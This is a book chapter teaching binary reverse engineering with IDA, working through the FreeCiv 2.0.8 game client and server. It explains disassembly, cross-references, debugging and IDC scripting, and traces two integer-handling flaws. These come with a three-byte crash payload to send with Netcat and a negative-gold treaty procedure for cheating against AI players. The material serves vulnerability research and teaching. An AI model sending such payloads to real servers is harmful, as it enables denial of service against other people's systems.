Chapter 23. Binary Reverse Engineering

Finding and exploiting software flaws is always one of the most effective ways to breach the security of any computer system or network. Likewise, if you are going to defend against this sort of attack, you need to find these bugs first so they can be fixed. Finding bugs is relatively straightforward if you have the source code, but what about closed source binary programs? This class of software is very common on networks today. So how do you find these bugs even if the code is not available to you? You reverse engineer the binary.

I've always loved to play video games; only trouble is, I'm not very good at them. I've learned to make up for my gaming inadequacies by reverse engineering the games so I can cheat. Odd as it might seem, I think this is the best way to practice reverse engineering skills or learn how to use a new tool. For the rest of this chapter, I'm going to reverse engineer an open source video game, FreeCiv 2.0.8. You can get a copy of this game, complete with source code, from http://www.freeciv.org. To get the most out of this chapter, you might want to install FreeCiv and follow along as I rip it apart from the binary. Because it's open source, you can even check your work as you go.

Interactive disassembler (IDA) is easily the most powerful disassembler in widespread use today. In my opinion, it is nothing short of amazing. It will disassemble almost anything you put in front of it, from run of the mill x86 binaries to ARM and PDP-11 code (if you can find any). It has powerful automatic analysis abilities, and when that fails, it comes equipped with a rich scripting environment. For all its great features, IDA does have some pitfalls that you need to watch out for if you're going to get by.

Let's start things off by opening up civclient.exe. The first thing you will see when you open a binary in IDA is the menu in Figure 23-1. IDA will present you with a number of options here, but unless you know that IDA has definitely misidentified the binary type, it's best to leave it with defaults. The next thing you see is IDA doing its auto analysis phase. It might take a while to finish, so this is a good time to get a cup of coffee and read a blog or two while IDA does its thing.

IDA supports a variety of search options, including searching for text strings, immediate values, or a sequence of bytes. These are useful when you are looking for a specific place in a binary when you know what you're looking for. In the past, I've been able to find cryptography sections of a program by searching for the specific byte sequences used to initialize the cryptographic functions. IDA also gives you the ability to search for the next code section, data section, errors, void operands, and unexplored sections. This can be helpful if you are trying to clean up a disassembly image quickly to make it as close to a completely accurate disassembly as possible.

Searching for text in the disassembly window is the most basic search you can do with IDA. This search will look for the occurrence of the given text anywhere on the disassembly window. This includes things like function names and comments added to the code. Later we will find more powerful ways to search for strings in the binary that will not include text on the disassembly window that is not from the binary (e.g., user comments). For now though, let's use this feature to find something interesting in the game we're reverse engineering.

To get started, I'd like to find where within the FreeCiv client (civclient.exe) it manipulates money for our player. So let's do a string text search for the word "gold" and see what we find. After searching for a few seconds, we find the following string:

Game: %s costs %d gold and you only have %d gold.

Paydirt! This is obviously a format string, and the third argument is probably the player's gold count. The code using this string looks like this:

.text:004081DD    mov dword ptr [esp], offset aGameSCostsDGol
.text:004081E4    call ds:libintl_gettext
.text:004081EA    mov edx, ds:dword_540A88
.text:004081F0    mov edx, [edx+2E0h]
.text:004081F6    mov [esp+0Ch], ebx
.text:004081FA    lea ebx, [ebp+var_408]
.text:00408200    mov [esp+8], eax
.text:00408204    mov eax, 200h
.text:00408209    mov [esp+14h], edx
.text:0040820D    mov [esp+10h], esi
.text:00408211    mov [esp+4], eax
.text:00408215    mov [esp+0], ebx
.text:00408218    call sub_42D5F0

If you look at the two lines of code in boldface, you will see that the third argument passed to the subroutine after the format string is [edx+2E0h]. The offset 2E0h is from some structure in memory that probably is associated with our current player's gold count.

All binary reverse engineering tools are designed with the goal of making the very low-level assembly code that makes up an executable into something a little easier to read and understand. One of the ways that IDA does this is by allowing us to define various high-level data types that we can overlay with structures in memory to help make sense of what the binary is doing. The three basic data types supported by IDA are structures, unions, and enumerated types.

We've already found some locations of interest within this binary, so it's useful to be able to keep some notes on what we're doing. IDA provides us with a number of ways to keep notes on what's going on in a program and to mark interesting parts of code for later review.

Now that we know how to manually traverse the code in the disassembly window, we could use this to manually compile information about a given function or variable by following all its function calls—but this would take way too much time. Luckily, while IDA was performing its auto-analysis of the file when we first opened it, it already figured out this information for us. This starts with something as simple as a call graph for a function, but current versions of IDA will also give us complete cross-references to and from a function as well as some pretty graphs and charts to help visualize all this data.

We've already seen one of the ways that IDA provides us with cross-reference information. Every function and variable has beside it an auto-generated comment with a list of memory locations where that function or variable is referenced. This is useful, but due to limitations on display space, this list is cut off after a few entries. You can increase the number of displayed cross-references by selecting Options → General..., clicking the tab labeled "Cross-references", and then increasing the value for "Number of displayed xrefs." You can get a complete list of cross-references by selecting the symbolic name and pressing the x key to bring up the cross-references window for this variable or function.

In addition to displaying lists of cross-references to a function or variable, IDA will give us a graph of all the cross-references to or from a given function or variable. This can be very helpful when we want to get an idea of how a function is used in relation to the rest of the program. Often you can tell almost all you need to know about a function simply by taking a peek at what functions call it and what functions it calls.

Earlier I did just that when searching for where civclient.exe modified the player's gold values. We found that in sub_41C130 there was some interesting code. Looking at the cross-reference graph, we can see what made me interested in this function. To get this graph, select View → Graphs → "Xrefs to". With a little bit of checking, we can see that the sub_41C130 subroutine is being called from the packet-processing code in the client. The more you look at it, the more it looks like the only places we adjust our gold is when we are processing packets from the server. I'll cut to the chase here and tell you the bad news. The client program takes all the information about our player, including how much gold we have, from the server. This makes for a major problem for us in our efforts to cheat, but don't despair because with the right tools we'll be able to fix this.

One reason that IDA is such a powerful reverse engineering tool is that it is able to clearly display massive amounts of information to the user with an interface that makes the data easy to digest quickly. It does this by breaking down the data into a number of data subview windows, which allows you to concentrate on different types of data separately.

We can learn a lot about a program by looking at its image on disk, but sometimes it can be really helpful to see the program as it is running. This is especially true for programs like malware that intentionally modify their code at runtime so that the image in memory is very different from the one on the disk. Debugging can also make it easier to follow data through an application. This is very important when doing vulnerability research because we spend most of our time tracking data to see how we can make it affect a system.

Now that we've located the place where packets are parsed in the server, let's attach to it with a debugger and see if we can find a useful bug. From the top menu, select Debugger → Start process to start the server in the debugger. Once you do this, you should take notice of the new memory layout that the system shows you. This is because we now have access to see all the runtime segments created by this process including the code and data for all the DLLs that the process links with.

A process will have much more information in the memory image used during debugging than it will in the binary image on disk. In some cases these images can be completely different. It is common for copy protection systems and malware to intentionally modify their memory segments when the program starts up to make reverse engineering difficult. In the later section "Making Scripts with IDC," we will discuss how to get around the best of these systems, but for now we can get around most of them by waiting for the system to decrypt its memory image for us and then saving a memory snapshot of it. To do this, select Debugger → "Take memory snapshot" from the top menu while in debugger mode.

Browsing around the packet parsing, I've found a couple bugs that are of use to us here. The first is a denial of service attack in which we can cause the server to exit because it believes the system is out of memory. The idea for this first bug is to trick the server into letting us supply an argument to malloc that is way too large. I have annotated the disassembly for function sub_4A93F0 to show you how we trigger this bug:

.text:004A93F0    push ebp
.text:004A93F1    xor  ecx, ecx
.text:004A93F3    mov  ebp, esp
.text:004A93F5    push edi
.text:004A93F6    push esi
.text:004A93F7    push ebx
.text:004A93F8    sub  esp, 5Ch
.text:004A93FB    mov  eax, [ebp+arg_8]
.text:004A93FE    mov  [ebp+decompress_packet], 0
.text:004A9402    mov  edi, [ebp+arg_0]
.text:004A9405    mov  [ebp+header_len], 0
.text:004A940C    mov  byte ptr [eax], 0
.text:004A940F    cmp  byte ptr [edi+8], 0 ; is argument NULL?
.text:004A9413    jz   loc_4A94AA      ; if so jump to return
.text:004A9419    mov  edx, [edi+14h]  ; total length of the data
.text:004A941C    mov  eax, [edx]
.text:004A941E    cmp  eax, 2          ; do we have at least 3 bytes?
.text:004A9421    jle  loc_4A94AA      ; if not jump to return
.text:004A9427    mov  [esp+68h+var_60], eax
.text:004A942B    lea  ebx, [ebp+var_28]
.text:004A942E    mov  eax, [edx+0Ch]
.text:004A9431    mov  [esp+68h+var_68], ebx
.text:004A9434    mov  [esp+68h+var_64], eax
.text:004A9438    call sub_4A82A0      ; init length info
.text:004A943D    mov  [esp+68h+var_68], ebx
.text:004A9440    lea  eax, [ebp+length]
.text:004A9443    mov  [esp+68h+var_64], eax
.text:004A9447    call sub_4A8860      ; read 16bit short from packet
.text:004A944C    mov  eax, [ebp+length]
.text:004A944F    cmp  eax, 0FFFFh     ; is length == 0xFFFF?
.text:004A9454    jz   loc_4A95D0
.text:004A945A    cmp  eax, 4000h      ; is length > 0x4000?
.text:004A945F    jg   short loc_4A94B4 ; if so we take this branch

We see from examining data while debugging to determine that [edi+14h] is a structure offset to the length of the packet (as returned by recv). The first check we have to pass to get any length value past the validation code is at .text:004A941E. The total packet length must be greater than 2. The next point of interest is at .text:004A9447 where the function reads in two octets and converts them to host order. We know that sub_4A8860 reads a short Int from the network and converts it to host order by analyzing the flow chart for that function, as seen in Figure 23-4. As we see a few lines later, this is being used as a length. At .test:004A945A the function checks to see whether this length value is greater than 0x4000. As we'll see in a minute, this is the most interesting code path to take, so let's make sure we send a length value larger than 0x4000. This takes us to the following code after the last jump instruction:

.text:004A94B4    mov [ebp+decompress_packet], 1
.text:004A94B8    sub eax, 4001h
.text:004A94BD    mov [ebp+header_len], 2
.text:004A94C4    jmp short loc_4A9461

The first line sets what appears to be some Boolean value to true. The next line is very interesting because it subtracts 0x4001 from the length we give it. I am always interested in places where I can get something to allocate zero bytes; even if we can't get that value to malloc, it is likely to do something interesting. The next line sets a local stack variable to 2. By looking at cross-references for this stack variable, we see that the possible values it is set with are always equal to the amount of length information the function has already read. This to me looks like it is a header length field. Experience tells me that protocols with length fields that include the length of the header are prone to errors. We have already shown that we can get a modified length value to be zero by setting the length field to be 0x4001, so this might get interesting. Let's see where it goes next:

.text:004A9461    mov [ebp+length2], eax
.text:004A9464    mov eax, [edi+14h]
.text:004A9467    xor ecx, ecx
.text:004A9469    mov edx, [ebp+length2]
.text:004A946C    cmp edx, [eax]      ; is length2 > packet length?
.text:004A946E    ja  short loc_4A94AA ; if so jump to return
.text:004A9470    cmp [ebp+decompress_packet], 0
.text:004A9474    jnz loc_4A9520      ; we take this branch

Right away they save the modified length value to the local stack variable that I have named length2. Remember that if we are able to set the length field in the packet to 0x4001, then length2 will be set to 0. At .text:004A946C, they check to make sure that this new length is not larger than the total number of bytes in the packet. We know we can make this new length zero, and zero is definitely less than the number of bytes in this packet, so we are able to evade this bounds check. Next, if you will remember, the Boolean variable decompress_packet was set to true in the last code block, so we take the jump at the bottom here:

.text:004A9520    mov eax, [ebp+header_len]
.text:004A9523    mov ebx, edx    ; edx holds the modified length
.text:004A9525    sub ebx, eax    ; alloc_len = length2 - header_len
.text:004A9527    lea eax, [ebx+ebx*4] ; do math to get alloc_len
.text:004A952A    lea eax, [eax+eax*4]
.text:004A952D    lea ecx, ds:0[eax*4]
.text:004A9534    mov [ebp+alloc_len], ecx
.text:004A9537    mov eax, offset aPackets_c ; "packets.c"
.text:004A953C    mov [esp+68h+var_5C], eax
.text:004A9540    mov eax, 179h
.text:004A9545    mov [esp+68h+var_60], eax
.text:004A9549    mov eax, offset aMalloc_27 ; "malloc"
.text:004A954E    mov [esp+68h+var_68], ecx ; alloc_len
.text:004A9551    mov [esp+68h+var_64], eax
.text:004A9555    call sub_405530

Just as expected, at .text:004A9525 they subtract the header length (in this case, 2) from the modified length value (in this case, 0). This means that there is an integer underflow here causing the allocation length to be much larger than the packet length. The three lines after the subtraction are an optimized way to multiply the allocation length by 100, thus making our allocation length even larger. The next interesting line is .text:004A954E, where they set the alloc_len to be the first argument to sub_405530.

.text:00405530    push ebp
.text:00405531    mov ebp, esp
.text:00405533    sub esp, 18h
.text:00405536    mov [ebp+var_C], ebx
.text:00405539    mov eax, [ebp+arg_8]
.text:0040553C    mov ebx, [ebp+alloc_len]
.text:0040553F    mov [ebp+var_4], edi
.text:00405542    mov edx, [ebp+arg_4]
.text:00405545    mov edi, [ebp+arg_C]
.text:00405548    mov [esp+18h+var_18], eax
.text:0040554B    mov eax, ebx
.text:0040554D    mov [ebp+var_8], esi
.text:00405550    mov [esp+18h+var_14], edi
.text:00405554    call sub_4054F0
.text:00405559    mov [esp+18h+var_18], ebx ; alloc_len
.text:0040555C    call malloc

Looking at the two bold lines in this last code block, you can easily see our negative, and thus when used as a length value, very large allocation length is passed to malloc. If you were to follow the code path that handles malloc failures, you would see that they exit any time that malloc fails because they think the system is out of memory. Here's the payload needed to trigger this bug:

40 01 00

You can test this out by sending that payload (which you can create in a hex editor) using a tool such as Netcat.

We might be able to keep from losing by crashing the server whenever we want, but that isn't going to help us win any games. The second bug is a little more complicated, but it will let us cheat enough to ensure an unfair advantage leading to a victory. Like the last bug, this one is an integer-handling flaw where we are able to trick the server into accepting invalid input.

I still would like to find a way to cheat and give us a huge amount of gold. After finding the last integer-handling flaw, I decided to check for similar integer overflows in gold handling. This means I wanted to find out what sorts of things I can do that will manipulate my gold amount where the client can choose the amounts. One place where we manipulate our gold price and where we can name our price is in diplomatic negotiations. I decided to play a game where I make some valid diplomatic treaty offers including gold gifts and follow the packet processing until I see the transfer of this gold take place. This led me to the following code:

.text:004123A4    mov eax, [edx+2E0h] ; givers gold amount
.text:004123AA    mov ebx, [ecx+8]    ; amount of gold we offered
.text:004123AD    sub eax, ebx
.text:004123AF    mov [edx+2E0h], eax ; givers gold amount
.text:004123B5    mov edx, [ebp+var_2C]
.text:004123B8    mov eax, [ecx+8]    ; amount of gold we offered
.text:004123BB    add [edx+2E0h], eax ; receivers gold amount

Remember from our first attempts at modifying our gold count that the offset 0x2E0 probably refers to the gold value for a player. Here I had two ideas: first, we might get lucky and they might just trust the client to not offer more gold than it has, and second, we might be able to offer negative gold. We see here that if we were to offer a negative amount of gold as part of a treaty, and if the other player were to accept it, then we would in fact be taking money from them and giving it to us. Let's see what the restrictions are on what amounts of gold we can offer. To do this, I set a watch point on my player's gold amount that would trigger on reads. This leads me to the following code:

.text:00411BF0    mov edx, [ebp+var_10]; case 0x1
.text:00411BF3    mov eax, [edi+8]
.text:00411BF6    cmp [edx+2E0h], eax
.text:00411BFC    jge loc_4117E1      ; default
.text:00411C02    mov [esp+48h+var_48], offset aGameYouDonTH_0

If we follow aGameYouDonTH_0, we find the following string:

Game: You don't have enough gold, you can't accept treaty.

This is a pretty strong indication that this is in fact the code that does validation on our gold amounts in treaty offers. So, what we can see here is that they are in fact checking to make sure that we don't offer more money than we have, but they are doing a signed check. This means that they are not verifying that we are not offering negative amounts of gold.

Putting this to the test, I tweaked the packets I was sending to the server so that I could offer negative amounts of gold to a player. Sure enough, just as expected, it lets me offer negative amounts of gold, and it does in fact end up operating just as if they gave me gold. This is an interesting result, but there is still one major problem with it. No player would accept a gift of negative gold unless they were very stupid, so offering this to a human player would not work. Most games include at least a few computer players, and unlike most humans, computers are all completely stupid. Let's see if we can't dupe the AI players into accepting this sort of offer. Looking at the cross-references for the function where the gold check was done, we find that there are two places it is called: sub_42D470 and sub_4B58D0. Let's set breakpoints at both, then get the client to send a treaty offer to an AI player. When we do that, the breakpoint triggers here only if the AI player accepts the treaty. When it does, it leads us to the following code in sub_4B58D0:

.text:004B5A0F    mov eax, [ebp+accept_treaty]
.text:004B5A12    test eax, eax ; is accept_treaty < 0 ?
.text:004B5A14    js short loc_4B5A47
.text:004B5A16    mov edx, [ebp+var_10]
.text:004B5A19    mov eax, [edx]
.text:004B5A1B    mov [ebp+arg_0], edi
.text:004B5A1E    mov [ebp+arg_4], eax
.text:004B5A21    add esp, 2Ch
.text:004B5A24    pop ebx
.text:004B5A25    pop esi
.text:004B5A26    pop edi
.text:004B5A27    pop ebp
.text:004B5A28    jmp sub_411740 ; This calls the checking code

We know that it will only call sub_411740 if the AI player has accepted the treaty. We call sub_411740 only if accept_treaty is greater than or equal to zero. This means we can assume that the local stack variable, accept_treaty, is the indicator for when the AI accepts the treaty. So let's look at the cross-reference for accept_treaty and see what code affects this value:

.text:004B5950    call sub_4B5020
.text:004B5955    add [ebp+accept_treaty], eax

This code appears in a loop. Every time we call sub_4B5020, the return value is added to accept_treaty. So, we want to see what sub_4B5020 returns:

.text:004B5100    mov byte_4DB940, 1
.text:004B5107    mov eax, esi
.text:004B5109    mov ebx, [ebp+var_C]
.text:004B510C    mov esi, [ebp+var_8]
.text:004B510F    mov edi, [ebp+var_4]
.text:004B5112    mov esp, ebp
.text:004B5114    pop ebp
.text:004B5115    retn

This is the code that runs when sub_4B5020 returns, so we can see that whatever is in esi when it goes to return is what gets added to the treaty_accept value.

Looking at the top of this function, we find a big switch statement. Single stepping through this shows us that each case in the switch statement is for different clauses in the treaty. For gold, we see the following code:

.text:004B5250    cmp [ebp+var_11], 0; case 0x1
.text:004B5254    jz loc_4B53FE
.text:004B525A    mov ecx, [ebp+arg_0]
.text:004B525D    mov esi, [ecx+8]    ; gold offer amount
.text:004B5260    neg esi
.text:004B5262    jmp loc_4B5100      ; jump to return

This combines with the following code:

.text:004B53FE    mov ebx, [ebp+arg_0]
.text:004B5401    mov esi, [ebx+8]    ; gold offer amount
.text:004B5404    jmp loc_4B5100      ; jump to return

On the surface, what we see here is bad news. It seems that the amount of gold offered is directly added to the treaty_accept value. This means that a negative gold gift will effectively subtract from the value that must be positive for the AI player to accept. Thinking further on this, I noticed a way to get around this problem. There is no check here for integer wrapping when they add this value to treaty_accept. This means that if we can find any other values that will subtract a predictable amount from treaty_accept, we can send a value so small that further subtractions will cause an integer wrap and the AI will accept the treaty. One way that I know we can get the computer to further subtract from treaty_accept is to declare war on the player.

I tested this, and sure enough, the AI player changed its mind and decided to accept my gift of negative gold. The final procedure for this is to declare war on an AI player, and then immediately offer them a peace treaty along with a large negative amount of gold. They will accept, you will generously give them a huge debt, and you will get a huge treasury, as shown in Figure 23-5.

IDA's scripting feature is the most interactive part of interactive disassembler. By writing IDC scripts (IDA's internal scripting language), we can add hotkeys, automate large tedious tasks, and even add new features to the disassembler. This feature makes it relatively easy to take on difficult reverse engineering tasks such as unpacking obfuscated or encrypted binaries. It also makes it easy to clean up large areas of disassembly to account for shortcomings in IDA.

Up until now I haven't told you how to do anything useful. To be of any help, the IDC scripts need to be able to access the IDA database. IDA comes with a large set of built-in functions for reading and writing to the database. Just about anything you can do in the user interface, you can script in IDC. Table 23-1 provides a small list of the most common functions for accessing the database. For a more complete list, see the online documentation for IDC built-in functions.

Table 23-1. Functions for accessing the database

Built-in function name

Description

AddHotKey

Assigns IDC routine to a hotkey.

AnalyseArea

Performs full analysis on a region.

AskStr

Prompts the user for a string.

AskFile

Prompts the user for a filename.

AskAddr

Prompts the user for an address.

AskLong

Prompts the user for a long integer value.

AskYN

Prompts the user for "yes" or "no."

Byte

Get the value of a program byte.

ChooseFunction

Prompts the user for a function.

Comment

Adds a regular comment.

CreateArray

Creates an array.

DelArrayElement

Removes an array element.

Dword

Get the value of a program double word.

Exec

Executes an OS command.

ExtLinA

Adds a comment above a line.

ExtLinB

Adds a comment below a line.

FindText

Searches for text in the disassembly window.

FindBinary

Searches for binary strings in the image.

FindImmediate

Searches for immediate values.

FindFuncEnd

Finds the end of a function.

GetCurrentLine

Gets the disassembly line at the cursor.

GetFirstIndex

Gets the index of the first existing array element.

GetFuncOffset

Gets the function offset of an address.

GetFunctionName

Gets the name of a function at a given address.

GetInputFile

Gets the input filename.

GetMnem

Gets the mnemonic for an instruction at the given address.

GetNextIndex

Gets the index of the next existing array element.

GetOpType

Gets the type of an instruction operand.

GetOperandValue

Gets the value used in an instruction operand.

GetOpnd

Gets a string of an instruction operand.

GetOriginalByte

Gets the original value of a byte before patching is applied.

GetPrevIndex

Gets the index of the previous existing array element.

ItemEnd

Gets the address of the end of the item at a specified address.

MakeArray

Marks data at an address as an array type.

MakeByte

Marks data at an address as a byte.

MakeCode

Marks data at an address as code.

MakeFunction

Marks data or code at an address as a function.

MaxEA

Gets the largest valid program offset.

Message

Prints a message in the status window.

MinEA

Gets the smallest value program offset.

ScreenEA

Gets the program address at the cursor.

SelEnd

Gets the end address of a selected region.

SelStart

Gets the start address of a selected region.

Wait

Waits for the end of auto-analysis.

If you work on a disassembly project long enough, you will eventually find yourself doing the same operations over and over again. For example, sometimes programs will mangle their string values in an effort to obfuscate things and make our job difficult. When I see this, I will usually write a script to descramble these strings and then bind that function call to a hotkey. Here is an example of such a function being bound to a hotkey:

1 #include <idc.idc>
2
3 static descrambleString (  ) {
4    auto s;
5    auto off;
6    auto start;
7    auto length;
8    auto left;
9    auto c;
10    auto last;
11
12    start = ScreenEA(  );
13    off = start;
14    length = Dword(off);
15    if(length > 4096) {
16        Message("length too large\n");
17        return;
18    }
19    left = length;
20    s = "";
21    off = start + 4;
22    c = 0;
23    last = 0;
24    while(left > 0) {
25        left = left - 1;
26        c = Byte(off+left)%256;
27        c = (c^last)%256;
28        last = c;
29        s = form("%c%s", c, s);
30    }
31    MakeRptCmt(start, s);
32    return;
33 }
34
35 static main (  ) {
36    hotkey('z', "descrambleString");
37 }

The format of the strings in this example is a four-byte length followed by a string where each successive character is XORed with the character after it in the string. Let's break down this code. We define our function, descrambleString, to have no arguments because the hotkey will not provide us with any. We get the input for this function on line 12 by calling ScreenEA. This function returns the address at which the curser is currently set, and we use this value on line 14 when we call Dword to get the length value starting at that address. We then loop through the string, incrementing the address we're reading data from a byte at a time to build the string. On line 31, we make a repeatable comment on the line by the string using the MakeRptCmt function. I could have used PatchByte to modify the string in the database instead of just documenting what the string stands for, but whenever possible I prefer to keep my changes to the binary to a minimum. Finally, in the main routine we register a hotkey with IDA bound to the z key. Don't forget to put the function name we want this hotkey to trigger in quotes.

My final example is a script that I use to clean up large disassembly by searching for all void types in the data segment and heuristically detecting pointers values. When it finds these probable pointers, it sets their type appropriately. I find that this not only makes the data segment far more useful, but it also aids IDA in its auto-analysis so we get a better overall disassembly.

1 #include <idc.idc>
2
3 static fixDataOffsets (  ) {
4    auto off;
5    auto end;
6    auto val;
7
8    off = ScreenEA(  );
9    end = SegEnd(off);
10    off = SegStart(off);
11    while(off < end) {
12        // only fixup data offset...
13        if((hasValue(GetFlags(off))) && (GetMnem(off) == "")) {
14            val = Dword(off);
15            if((val >= 0x400000) && (val <= 0x500000)) {
16                opoffEx(off, 0, 2, −1, 0, 0x0);
17            }
18            wait(  );
19            off = ItemEnd(off);
20        } else if(GetMnem(off) != "") {
21            off = ItemEnd(off);
22        } else if(!hasValue(GetFlags(off))) {
23            Message("Complete.\n");
24            return;
25        } else {
26            off++;
27        }
28    }
29    Message("Complete");
30    return;
31 }

On line 8, we get the current address of the curser on the screen by calling ScreenEA. We then find the beginning and end of the segment this address is in by calling SegEnd and SegStart, respectively. The idea here is we want to loop through this segment (which is presumably a data segment) and find Dwords that look like they might be pointers. On line 13, we call hasValue to make sure that there is a value[32] at this address, and we check to make sure that there is not a machine instruction at this address by calling GetMnem. If the value at a given address is an assembly instruction, GetMnem returns a string to its pneumonic; otherwise, it returns an empty string. If this check fails because the address has an assembly instruction at that address, we skip past the instruction by setting the offset to the address at the end of the current instruction by calling ItemEnd on line 21. If this check fails because there was no value located at this address, then we assume we have hit the end of usable data in this segment and we exit prematurely. If the address has a value and is not an instruction, then we do a quick check to see whether its value falls within a practical range for it to be a pointer. If it is, we call opoffEx to set the type at this address to be an offset. On line 18, we call wait to give IDA a chance to catch up with the changes we have made to the database and to perform auto-analysis based on the new type information we have given it. We could have left this out, but it will make IDA appear to be unresponsive during the run of our script and will almost lock up doing auto-analysis when we finish.

You may notice that we have not supplied a main routine with this script. I've left it out here because I don't want fixDataOffsets to run automatically when we load this. To start this function running, you will need to select File → "IC command..." from the top menu, enter fixDataOffsets( );, and press OK.



[32] An example of when there is no value at an address is an address in the stack segment when a program is not being debugged.